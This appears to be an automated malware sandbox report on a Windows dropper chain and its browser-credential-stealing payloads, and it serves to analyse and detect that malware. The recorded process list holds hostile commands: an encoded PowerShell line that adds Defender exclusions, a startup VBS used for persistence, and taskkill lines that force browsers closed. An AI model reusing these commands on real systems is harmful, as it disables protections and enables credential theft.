                          Source: unknownNetwork traffic detected: HTTP traffic on port 63872 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63916 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63994 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 64001 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63927 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63833 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63757 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63904 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63961 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63800 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63723 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63867 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63949 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63779 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63811 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63983 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 64012 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63822 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63793 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 64035 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63896 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63982 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63873 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63844 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63821 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63970 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 64017 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63781 -> 443
                          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:63716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63854 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63867 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63896 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63909 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63923 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63970 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:64022 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:64023 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:64029 version: TLS 1.2

                          System Summary

                          barindex
                          Source: 203f60e481.exe, 0000000F.00000002.2683902939.0000000000112000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7a95dc08-a
                          Source: 203f60e481.exe, 0000000F.00000002.2683902939.0000000000112000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f4f029cc-c
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeFile dump: DiagTrack.exe.7.dr 298941256Jump to dropped file
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: .idata
                          Source: 24da741fb6.exe.6.drStatic PE information: section name:
                          Source: 24da741fb6.exe.6.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: .rsrc
                          Source: random[1].exe0.6.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: 0d8313073f.exe.6.drStatic PE information: section name:
                          Source: 0d8313073f.exe.6.drStatic PE information: section name: .rsrc
                          Source: 0d8313073f.exe.6.drStatic PE information: section name: .idata
                          Source: 0d8313073f.exe.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: .idata
                          Source: 8a0ff7e068.exe.6.drStatic PE information: section name:
                          Source: 8a0ff7e068.exe.6.drStatic PE information: section name: .idata
                          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004F70496_2_004F7049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004F88606_2_004F8860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004F78BB6_2_004F78BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004F2D106_2_004F2D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004B4DE06_2_004B4DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004F31A86_2_004F31A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004E7F366_2_004E7F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004B4B306_2_004B4B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004F779B6_2_004F779B
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_02B2CE307_2_02B2CE30
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_02B28DD87_2_02B28DD8
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_02B28DC97_2_02B28DC9
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_074B8A607_2_074B8A60
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_074B8A707_2_074B8A70
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_074DEB907_2_074DEB90
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_074DDEE07_2_074DDEE0
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_074C00407_2_074C0040
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeCode function: 7_2_074C00067_2_074C0006
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0471B4908_2_0471B490
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0471B4718_2_0471B471
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04711C688_2_04711C68
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04711CEF8_2_04711CEF
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\chrome.dll 81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1144
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9981586341961853
                          Source: file.exeStatic PE information: Section: uqbleicu ZLIB complexity 0.9948190727210782
                          Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9981586341961853
                          Source: skotes.exe.0.drStatic PE information: Section: uqbleicu ZLIB complexity 0.9948190727210782
                          Source: random[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.9980591202978056
                          Source: 24da741fb6.exe.6.drStatic PE information: Section: ZLIB complexity 0.9980591202978056
                          Source: random[1].exe0.6.drStatic PE information: Section: onvelaog ZLIB complexity 0.9949069817622336
                          Source: 0d8313073f.exe.6.drStatic PE information: Section: onvelaog ZLIB complexity 0.9949069817622336
                          Source: Fwkdsz[1].exe.6.dr, Vnuzxogml.csCryptographic APIs: 'CreateDecryptor'
                          Source: Fwkdsz.exe.6.dr, Vnuzxogml.csCryptographic APIs: 'CreateDecryptor'
                          Source: DiagTrack.exe.7.dr, Vnuzxogml.csCryptographic APIs: 'CreateDecryptor'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, p048vnIPt6o8p1FM45C.csCryptographic APIs: 'CreateDecryptor'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, p048vnIPt6o8p1FM45C.csCryptographic APIs: 'CreateDecryptor'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, p048vnIPt6o8p1FM45C.csCryptographic APIs: 'CreateDecryptor'
                          Source: 7.2.Fwkdsz.exe.426c600.3.raw.unpack, p048vnIPt6o8p1FM45C.csCryptographic APIs: 'CreateDecryptor'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, ggiSZxCKb5c75GwVhH.csCryptographic APIs: 'CreateDecryptor'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, ggiSZxCKb5c75GwVhH.csCryptographic APIs: 'CreateDecryptor'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, MTVxnAMz9gQcFl6SsyU.csCryptographic APIs: 'CreateDecryptor'
                          Source: 7.2.Fwkdsz.exe.4072018.1.raw.unpack, MTVxnAMz9gQcFl6SsyU.csCryptographic APIs: 'CreateDecryptor'
                          Source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@69/56@31/15
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fwkdsz[1].exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:64:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:120:WilError_03
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs"
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2981796993.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2981796993.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2981796993.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2981796993.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2981796993.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2981796993.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2981796993.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: 24da741fb6.exe, 0000000B.00000003.2528294847.00000000059A5000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2824019344.000000001DA58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2981796993.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT url, title, last_visit_time, typed_count FROM urls WHERE hidden = 0promiseLangPacksUpdated - waiting for language pack updates to stage.toolbar-menubar{"active":true,"fullscreen":true,"tabsintitlebar":false}resource://devtools/client/performance-new/shared/typescript-lazy-load.jsm.jschrome://browser/content/migration/migration-wizard-constants.mjsgetCanApplyUpdates - in background task mode, assuming user can't elevatehandleUpdateFailure - Failure is a write error. Setting state to pendingresource://devtools/client/performance-new/shared/typescript-lazy-load.jsm.jsTabsToolbar{"active":true,"fullscreen":false,"tabsintitlebar":false}https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsUnable to find the document or the window of the profiler toolbar item.Error while computing isPotentiallyTrustWorthy for pdf viewer page: TabsToolbar{"active":true,"fullscreen":true,"tabsintitlebar":false}PanelUI._onNotificationButtonEvent: couldn't find notification elementresource://devtools/client/performance-new/shared/background.jsm.jstoolbar-menubar{"active":true,"fullscreen":false,"tabsintitlebar":false}PanelUI._onNotificationButtonEvent(event, 'secondarybuttoncommand');https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helphttps://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesTried to move an unmovable Places node, reverting to a copy operation.resource://devtools/client/performance-new/popup/menu-button.jsm.jsUpdateService:_postUpdateProcessing - Attempting handleUpdateFailureUpdateService:_postUpdateProcessing - handleUpdateFailure success.UpdateService:_registerOnlineObserver - observer already registeredUpdateManager:UpdateManager - Initialized downloadingUpdate state to UpdateManager:cleanupDownloadingUpdate - cleaning up downloading update.CheckerService:#getCanMigrate - this installation can be migratedUpdateService:_postUpdateProcessing - Cleaning up active updates.UpdateService:_postUpdateProcessing - Setting update's state from CheckerService:checkForUpdates - Making new check request for check CheckerService:#updateCheck - request completed downloading documentUpdateManager:refreshUpdateStatus - Attempting handleUpdateFailureCheckerService:stopCheck - Not actually cancelling request because UpdateService.canUsuallyCheckForUpdates - able to check for updatesDownloader: cancel - Ignoring cancel request of finished downloadDownloader:_canUseBits - Not using BITS because it was already triedUpdateService:_postUpdateProcessing - Cleaning up unexpected state.UpdateManager:refreshUpdateStatus - Staging appears to have crashed.UpdateService:_postUpdateProcessing - Setting update's errorCode
                          Source: 0d8313073f.exe, 0000000D.00000002.2973785580.000000001DB85000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2981796993.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: file.exeReversingLabs: Detection: 52%
                          Source: file.exeVirustotal: Detection: 54%
                          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe "C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe "C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe "C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe"
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe "C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1144
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
